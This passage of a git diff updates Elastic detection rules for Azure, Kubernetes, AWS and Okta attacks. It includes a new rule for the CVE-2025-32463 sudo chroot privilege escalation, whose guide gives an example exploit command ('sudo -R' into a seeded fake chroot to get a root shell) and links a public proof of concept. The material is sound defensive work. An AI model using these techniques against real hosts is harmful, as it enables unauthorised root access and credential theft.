usage, or application activity for further context.\n\n### False positive analysis\n\n- Some applications may request high-privilege scopes for legitimate purposes. Validate whether the application is verified, developed by Microsoft, or approved internally by your organization.\n- Review publisher verification, app ownership, and scope alignment with the intended business use case.\n\n### Response and remediation\n\n- Revoke the application\u2019s OAuth grant using Graph API or PowerShell. Use the Remove-AzureADOAuth2PermissionGrant cmdlet.\n- Remove the associated service principal from Azure AD.\n- Reset credentials or revoke tokens for affected users.\n- Block the application via Conditional Access or Defender for Cloud Apps policies.\n- Enable the Admin Consent Workflow in Azure AD to prevent unsanctioned user approvals in the future.\n- Report any malicious applications to Microsoft to protect other tenants.\n", - "query": "event.dataset: \"azure.auditlogs\" and\n (\n azure.auditlogs.operation_name:\"Consent to application\"\n or event.action:\"Consent to application\"\n )\n and event.outcome: \"success\"\n and azure.auditlogs.properties.additional_details.key: \"AppId\"\n", - "references": [ - "https://www.wiz.io/blog/midnight-blizzard-microsoft-breach-analysis-and-best-practices", - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", - "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", - "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.22.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.additional_details.key", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", - "Tactic: Credential Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/", - "subtechnique": [ - { - "id": "T1566.002", - "name": "Spearphishing Link", - "reference": "https://attack.mitre.org/techniques/T1566/002/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 215 - }, - "id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_215", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_103.json b/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_103.json deleted file mode 100644 index 94ac548fbcc..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_103.json +++ /dev/null @@ -1,73 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies the creation of role binding or cluster role bindings. You can assign these roles to Kubernetes subjects (users, groups, or service accounts) with role bindings and cluster role bindings. An adversary who has permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high privileges roles.", - "from": "now-20m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Kubernetes Rolebindings Created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Kubernetes Rolebindings Created\nAzure Kubernetes role bindings are crucial for managing access control within Kubernetes clusters, allowing specific permissions to be assigned to users, groups, or service accounts. Adversaries with the ability to create these bindings can escalate privileges by assigning themselves or others high-level roles, such as cluster-admin. The detection rule monitors Azure activity logs for successful creation events of role or cluster role bindings, signaling potential unauthorized privilege escalation attempts.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service account associated with the role binding creation event. Focus on the `event.dataset` and `azure.activitylogs.operation_name` fields to confirm the specific operation.\n- Check the `event.outcome` field to ensure the operation was successful and not a failed attempt, which might indicate a misconfiguration or testing.\n- Investigate the permissions and roles assigned to the identified user or service account to determine if they have legitimate reasons to create role bindings or cluster role bindings.\n- Examine the context of the role binding creation, such as the time of the event and any related activities, to identify any unusual patterns or correlations with other suspicious activities.\n- Verify if the role binding grants elevated privileges, such as cluster-admin, and assess the potential impact on the cluster's security posture.\n- Cross-reference the event with any recent changes in the cluster's configuration or access policies to understand if the role binding creation aligns with authorized administrative actions.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger alerts when legitimate users create role bindings for operational purposes. To manage this, identify and whitelist specific user accounts or service accounts that regularly perform these tasks.\n- Automated deployment tools or scripts that configure Kubernetes clusters might create role bindings as part of their normal operation. Exclude these tools by filtering out known service accounts or IP addresses associated with these automated processes.\n- Scheduled maintenance or updates to the Kubernetes environment can result in multiple role binding creation events. Establish a maintenance window and suppress alerts during this period to avoid unnecessary noise.\n- Development and testing environments often have frequent role binding changes. Consider creating separate monitoring rules with adjusted thresholds or risk scores for these environments to reduce false positives.\n- Collaboration with the DevOps team can help identify expected role binding changes, allowing for preemptive exclusion of these events from triggering alerts.\n\n### Response and remediation\n\n- Immediately revoke any newly created role bindings or cluster role bindings that are unauthorized or suspicious to prevent further privilege escalation.\n- Isolate the affected Kubernetes cluster from the network to prevent potential lateral movement or further exploitation by the adversary.\n- Conduct a thorough review of recent activity logs to identify any unauthorized access or changes made by the adversary, focusing on the time frame around the alert.\n- Reset credentials and access tokens for any compromised accounts or service accounts involved in the unauthorized role binding creation.\n- Escalate the incident to the security operations team for further investigation and to determine if additional clusters or resources are affected.\n- Implement additional monitoring and alerting for any future role binding or cluster role binding creation events to ensure rapid detection and response.\n- Review and tighten role-based access control (RBAC) policies to ensure that only necessary permissions are granted to users, groups, and service accounts, minimizing the risk of privilege escalation.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n\t(\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE\" or\n\t \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE\") and\nevent.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "1c966416-60c1-436b-bfd0-e002fddbfd89", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "1c966416-60c1-436b-bfd0-e002fddbfd89_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1d485649-c486-4f1d-a99c-8d64795795ad_2.json b/packages/security_detection_engine/kibana/security_rule/1d485649-c486-4f1d-a99c-8d64795795ad_2.json new file mode 100644 index 00000000000..90d8e97606b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1d485649-c486-4f1d-a99c-8d64795795ad_2.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious use of sudo's --chroot / -R option consistent with attempts to exploit CVE-2025-32463 (the \"sudo chroot\" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*", + "logs-crowdstrike.fdr*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential CVE-2025-32463 Sudo Chroot Execution Attempt", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential CVE-2025-32463 Sudo Chroot Execution Attempt\n\nThis rule highlights sudo invoked with the chroot (-R/--chroot) option outside normal administration, a behavior tied to CVE-2025-32463 where attackers force sudo to load attacker-controlled NSS configs or libraries and escalate to root. An attacker pattern: running sudo -R /tmp/fakechroot /bin/sh after seeding that directory with malicious nsswitch.conf and libnss to obtain a root shell. Treat unexpected chrooted sudo on Linux hosts as high-risk privilege escalation activity.\n\n### Possible investigation steps\n\n- Extract the chroot target path from the event and enumerate its etc and lib directories for attacker-seeded NSS artifacts (nsswitch.conf, libnss_*, ld.so.preload) and fake passwd/group files, noting recent mtime, ownership, and world-writable files.\n- Pivot to file-creation and modification telemetry to identify processes and users that populated that path shortly before execution (e.g., curl, wget, tar, git, gcc), linking them to the invoking user to establish intent.\n- Review session and process details to see if a shell or interpreter was launched inside the chroot and whether an euid transition to 0 occurred, indicating a successful privilege escalation.\n- Confirm sudo's package version and build options and the user\u2019s sudoers policy (secure_path/env_* settings and any NOPASSWD allowances) to assess exploitability and whether chroot usage was authorized.\n- Collect and preserve the chroot directory contents and relevant audit/log artifacts, and scope by searching for similar chroot invocations or NSS file seeds across the host and fleet.\n\n### False positive analysis\n\n- A legitimate offline maintenance session where an administrator chroots into a mounted system under /mnt or /srv using sudo --chroot to run package or initramfs commands, which will trigger when the invoked program is not in the whitelist.\n- An image-building or OS bootstrap workflow that stages a root filesystem and uses sudo -R to execute a shell or build/configuration scripts inside the chroot, producing the same pattern from a known user or host context.\n\n### Response and remediation\n\n- Immediately isolate the affected host from the network, revoke the invoking user\u2019s sudo privileges, and terminate any chrooted shells or child processes spawned via \u201csudo -R /bin/sh\u201d or similar executions.\n- Preserve evidence and then remove attacker-seeded NSS and loader artifacts within the chroot path\u2014delete or replace nsswitch.conf, libnss_*.so, ld.so.preload, passwd, and group files, and clean up world-writable staging directories like /tmp/fakechroot.\n- Upgrade sudo to a fixed build that addresses CVE-2025-32463, and recover by restoring any modified system NSS and loader files from known-good backups while validating ownership, permissions, and hashes.\n- Escalate to full incident response if a root shell or process with euid 0 is observed, if /etc/ld.so.preload or /lib/libnss_*.so outside the chroot show unauthorized changes, or if similar \u201csudo -R\u201d executions appear across multiple hosts.\n- Harden by updating sudoers to remove NOPASSWD for chrooted commands, enforce Defaults env_reset and secure_path with noexec, disable \u201c--chroot\u201d usage for non-admin workflows, and monitor for creation of libnss_*.so or nsswitch.conf in non-standard directories.\n- Add platform controls by enabling SELinux/AppArmor policies on sudo and the dynamic loader, applying nodev,nosuid,noexec mounts to /tmp and build paths, and setting immutability (chattr +i) on /etc/nsswitch.conf where operationally feasible.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"executed\", \"process_started\", \"ProcessRollup2\") and\nprocess.name == \"sudo\" and process.args like (\"-R\", \"--chroot*\") and\n// To enforce the -R and --chroot arguments to be for sudo specifically, while wildcarding potential full sudo paths\nprocess.command_line like (\"*sudo -R*\", \"*sudo --chroot*\") \n", + "references": [ + "https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot", + "https://github.com/kh4sh3i/CVE-2025-32463" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "1d485649-c486-4f1d-a99c-8d64795795ad", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Use Case: Vulnerability", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "1d485649-c486-4f1d-a99c-8d64795795ad_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_103.json b/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_103.json deleted file mode 100644 index 8f3db824029..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_103.json +++ /dev/null @@ -1,81 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a rotation to storage account access keys in Azure. Regenerating access keys can affect any applications or Azure services that are dependent on the storage account key. Adversaries may regenerate a key as a means of acquiring credentials to access systems and resources.", - "false_positives": [ - "It's recommended that you rotate your access keys periodically to help keep your storage account secure. Normal key rotation can be exempted from the rule. An abnormal time frame and/or a key rotation from unfamiliar users, hosts, or locations should be investigated." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Storage Account Key Regenerated", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Storage Account Key Regenerated\n\nAzure Storage Account keys are critical credentials that grant access to storage resources. They are often used by applications and services to authenticate and interact with Azure Storage. Adversaries may regenerate these keys to gain unauthorized access, potentially disrupting services or exfiltrating data. The detection rule monitors for key regeneration events, flagging successful operations as potential indicators of credential misuse, thus enabling timely investigation and response.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific storage account associated with the key regeneration event by examining the operation_name field for \"MICROSOFT.STORAGE/STORAGEACCOUNTS/REGENERATEKEY/ACTION\".\n- Check the event.outcome field to confirm the success of the key regeneration and gather details about the user or service principal that initiated the action.\n- Investigate the user or service principal's recent activities in Azure to determine if there are any other suspicious actions or patterns that could indicate unauthorized access or misuse.\n- Assess the impact on applications and services that rely on the affected storage account key by identifying dependencies and checking for any service disruptions or anomalies.\n- Review access policies and permissions for the storage account to ensure they are appropriately configured and consider implementing additional security measures, such as Azure Key Vault, to manage and rotate keys securely.\n\n### False positive analysis\n\n- Routine key rotation by administrators or automated scripts can trigger alerts. To manage this, identify and document regular key rotation schedules and exclude these events from alerts.\n- Development and testing environments often regenerate keys frequently. Exclude these environments from alerts by filtering based on environment tags or resource names.\n- Third-party integrations or services that require periodic key regeneration might cause false positives. Work with service owners to understand these patterns and create exceptions for known, legitimate services.\n- Azure policies or compliance checks that enforce key rotation can also lead to false positives. Coordinate with compliance teams to align detection rules with policy schedules and exclude these events.\n- Ensure that any automated processes that regenerate keys are logged and documented. Use this documentation to create exceptions for these processes in the detection rule.\n\n### Response and remediation\n\n- Immediately revoke the regenerated storage account keys to prevent unauthorized access. This can be done through the Azure portal or using Azure CLI commands.\n- Identify and update all applications and services that rely on the compromised storage account keys with new, secure keys to restore functionality and prevent service disruption.\n- Conduct a thorough review of access logs and audit trails to identify any unauthorized access or data exfiltration attempts that may have occurred using the regenerated keys.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems or accounts have been compromised.\n- Implement conditional access policies and multi-factor authentication (MFA) for accessing Azure resources to enhance security and prevent similar incidents.\n- Review and update the storage account's access policies and permissions to ensure that only authorized users and applications have the necessary access.\n- Enhance monitoring and alerting mechanisms to detect future unauthorized key regeneration attempts promptly, ensuring timely response to potential threats.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.STORAGE/STORAGEACCOUNTS/REGENERATEKEY/ACTION\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "1e0b832e-957e-43ae-b319-db82d228c908", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "1e0b832e-957e-43ae-b319-db82d228c908_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1f45720e-5ea8-11ef-90d2-f661ea17fbce_5.json b/packages/security_detection_engine/kibana/security_rule/1f45720e-5ea8-11ef-90d2-f661ea17fbce_5.json new file mode 100644 index 00000000000..de6399a8063 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1f45720e-5ea8-11ef-90d2-f661ea17fbce_5.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a federated user logs into the AWS Management Console. Federated users are typically given temporary credentials to access AWS services. If a federated user logs into the AWS Management Console without using MFA, it may indicate a security risk, as MFA adds an additional layer of security to the authentication process. However, CloudTrail does not record whether a Federated User utilized MFA as part of authentication \u2014 that MFA decision often occurs at a third-party IdP (e.g., Okta, Azure AD, Google). As a result, CloudTrail fields such as MFAUsed / mfaAuthenticated appear as \u201cNo/false\u201d for federated console logins even if IdP MFA was required. This alert should be correlated with IdP authentication logs to verify whether MFA was enforced for the session. Increase priority if you find a related \"GetSigninToken\" event whose source IP / ASN / geo or user-agent differs from the subsequent \"ConsoleLogin\" (possible token relay/abuse). Same-IP/UA pairs within a short window are more consistent with expected operator behavior and can be triaged with lower severity.", + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.session_context.session_issuer.arn", + "aws.cloudtrail.user_identity.session_context.session_issuer.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Sign-In Console Login with Federated User", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS Sign-In Console Login with Federated User\n\nFederated users in AWS are granted temporary credentials to access resources, often without the need for a permanent account. This setup is convenient but can be risky if not properly secured with multi-factor authentication (MFA). Adversaries might exploit this by using stolen or misconfigured credentials to gain unauthorized access. CloudTrail alone cannot reliably indicate MFA usage for federated logins. This rule surfaces potentially risky access for analyst review and IdP correlation.\n\n### Possible investigation steps\n\n- **Identify the prinicipal involved**\n - `aws.cloudtrail.user_identity.arn` (federated session ARN)\n - `aws.cloudtrail.user_identity.session_context.session_issuer.*` (role ARN/name, account) of the identity that created the federated session.\n- **Investigate the source context**\n - examine `source.ip`, ASN, `geo` fields, and `user_agent.original`\n - Compare against normal IP ranges, known user-agents and expected locations for this identity\n#### Correlate to raise/lower priority\n- **Check IdP MFA:** Find the corresponding IdP login around the same time and verify MFA was required and passed. If IdP shows **no MFA**, raise severity.\n- **Federation token pivot:** Look for a nearby `signin.amazonaws.com` `GetSigninToken` API call.\n - **More suspicious:** token creation and console login from different public IPs/ASNs/geo fields.\n - **Less suspicious:** same IP and expected user agents within ~10\u201315 minutes (typical operator behavior).\n- **Rareness/anomaly signals:** new/rare role or session issuer, rare source IP/ASN/geo, unusual time-of-day, multiple ConsoleLogin events from disparate networks in a short window.\n- Review recent activity associated with the federated user to identify any unusual or unauthorized actions that may have occurred following the login event.\n- Assess the configuration and policies of the Identity Provider (IdP) used for federated access to ensure MFA is enforced and properly configured for all users.\n\n### Related rules\n- AWS Sign-In Token Created - f754e348-f36f-4510-8087-d7f29874cc12\n\n### False positive analysis\n- Organizations using SSO for console access will routinely see federated `ConsoleLogin` where CloudTrail shows `MFAUsed: \"No\"` \u2014 this is expected due to IdP-side MFA.\n- Internal tools/automation that create federation links (`GetSigninToken`) for operators.\n- Maintain allow-lists for corp/VPN CIDRs, approved ASNs, and known automation user-agents.\n\n### Response and remediation\n- If IdP confirms MFA and the source context is expected: document and close.\n- If IdP shows no MFA or context is suspicious:\n - Notify the security team and relevant stakeholders about the potential security breach to ensure coordinated response efforts.\n - Disable/lock the IdP account pending review; invalidate IdP sessions if supported.\n - Temporarily restrict access (e.g., SCPs, session policies, IP-based conditions).\n - Conduct a thorough review of AWS CloudTrail logs to identify any suspicious activities or unauthorized access attempts associated with both the intitiating user and the federated user account.\n - Hunt for a preceding `GetSigninToken` from a different IP/ASN/UA (possible token relay).\n - Ensure IdP policy enforces MFA for AWS app access; re-verify role trust and least-privilege policies.\n- Implement or enforce multi-factor authentication (MFA) for all federated user accounts to enhance security and prevent similar incidents in the future.\n- Review and update IAM policies and roles associated with federated users to ensure they follow the principle of least privilege.\n", + "query": "event.dataset: \"aws.cloudtrail\" and \n event.provider: \"signin.amazonaws.com\" and \n event.action : \"ConsoleLogin\" and \n aws.cloudtrail.user_identity.type: \"FederatedUser\" and\n event.outcome: \"success\"\n", + "references": [ + "https://hackingthe.cloud/aws/post_exploitation/create_a_console_session_from_iam_credentials/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1f45720e-5ea8-11ef-90d2-f661ea17fbce", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Amazon Web Services", + "Data Source: AWS", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "1f45720e-5ea8-11ef-90d2-f661ea17fbce_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_204.json b/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_204.json deleted file mode 100644 index a4a54d7b830..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_204.json +++ /dev/null @@ -1,78 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts.", - "false_positives": [ - "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.", - "Shared systems such as Kiosks and conference room computers may be used by multiple users." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "High Number of Okta Device Token Cookies Generated for Authentication", - "note": "## Triage and analysis\n\n### Investigating High Number of Okta Device Token Cookies Generated for Authentication\n\nThis rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack.\n\n#### Possible investigation steps:\n- Since this is an ES|QL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy.\n - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying.\n- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful.\n - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API.\n- Examine the `okta.outcome.result` field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session 